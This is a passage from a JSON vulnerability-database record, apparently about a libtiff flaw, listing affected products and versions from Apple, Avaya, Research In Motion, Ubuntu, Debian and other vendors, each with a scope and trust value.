          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.1"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.2-5.2.1"
          },
          {
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.6"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.5"
          },
          {
            "model": "beta36",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "clientless vpn gateway series sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "44004.0"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1.3"
          },
          {
            "model": "beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.0"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.3"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.7"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3.2"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.5"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.72"
          },
          {
            "model": "alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.0"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.3"
          },
          {
            "model": "hat enterprise linux desktop optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3.1"
          },
          {
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.4"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.6"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.2"
          },
          {
            "model": "linux armel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.3"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "8.0.2.20"
          },
          {
            "model": "in motion blackberry enterprise server for exchange sp3 hotfix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.03"
          },
          {
            "model": "safari for windows",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.4"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.7"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.1"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.2"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.2"
          },
          {
            "model": "hat enterprise linux server optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.7"
          },
          {
            "model": "clientless vpn gateway series sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "44004.0"
          },
          {
            "model": "beta28",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.10"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "2.0.0.65"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.6"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1.2"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pardus",
            "version": "20110"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "aura session manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "6.0"
          },
          {
            "model": "beta2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.6.0"
          },
          {
            "model": "alpha4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0"
          },
          {
            "model": "beta6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "4.0"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "networks contivity secure ip services gateway sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "46004.0"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.0"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11.4"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "messaging storage server sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3.5"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.4"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.1"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux enterprise sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.6.0"
          },
          {
            "model": "in motion blackberry enterprise server for exchange mr2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "enterprise linux desktop version",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.3"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "9.1"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.4"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.0"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "model": "mobile safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "0"
          },
          {
            "model": "alpha3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.1"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.2"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.3"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.7"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.5"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "9"
          },
          {
            "model": "in motion blackberry enterprise server for domino mr3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.5"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.3"
          },
          {
            "model": "in motion blackberry enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.0"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.8.2"
          },
          {
            "model": "tv",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.3"
          },
          {
            "model": "in motion blackberry enterprise server express for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.7.1"
          },
          {
            "model": "tv",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2"
          },
          {
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "aura system manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.3"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "messaging storage server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "opencall multiservice controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.1"
          },
          {
            "model": "enterprise server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "9.0"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "tv",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.4"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.5"
          },
          {
            "model": "opencall multiservice controller sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.0"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "linux x86 64 -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.1"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.3"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.6"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "9.0.1.8"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.1"
          },
          {
            "model": "networks contivity secure ip services gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "46004.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.0"
          },
          {
            "model": "enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "5"
          },
          {
            "model": "in motion blackberry enterprise server for exchange sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0"
          },
          {
            "model": "in motion blackberry enterprise server mr5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.6"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "aura communication manager utility services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "beta35",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.5"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "hat enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.0"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.4"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "model": "beta24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "esignal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "esignal",
            "version": "6.0.2"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.9.3"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.2"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2010.0"
          },
          {
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.3"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.10"
          },
          {
            "model": "itunes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "7.3"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.0"
          },
          {
            "model": "hat enterprise linux hpc node optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.2"
          },
          {
            "model": "in motion blackberry enterprise server express for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1.4"
          },
          {
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "model": "in motion blackberry enterprise server express for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0.5"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.3"
          },
          {
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.10"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "beta31",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "networks contivity secure ip services gateway sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "46004.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "in motion blackberry enterprise server for novell groupwise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.0"
          },
          {
            "model": "aura application server sip core",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53001.0"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "in motion blackberry enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "4.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2.1"
          },
          {
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.1"
          },
          {
            "model": "clientless vpn gateway series sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "symantec",
            "version": "44004.0"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "model": "beta18",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "beta34",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.6.4"
          },
          {
            "model": "libtiff",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1.3"
          },
          {
            "model": "beta29",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "in motion blackberry enterprise server for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "aura system manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.2"
          },
          {
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.0"
          },
          {
            "model": "messaging storage server sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "model": "ipad",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "0"
          },
          {
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "model": "in motion blackberry enterprise server for domino mr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "in motion blackberry enterprise server express for exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.2"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.8"
          },
          {
            "model": "beta32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.4"
          },
          {
            "model": "in motion blackberry enterprise server for domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "research",
            "version": "5.0.3"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.3.4"
          },
          {
            "model": "hat enterprise linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "6"
          },
          {
            "model": "alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "libtiff",
            "version": "3.5.7"
          },
          {
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11.3"
          },
          {
            "model": "linux x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1.2"
          },
          {
            "model": "aura session manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "model": "safari",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.4"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "5.0.1"
          },
          {
            "model": "linux x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "13.0"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.2.8"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4.1.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
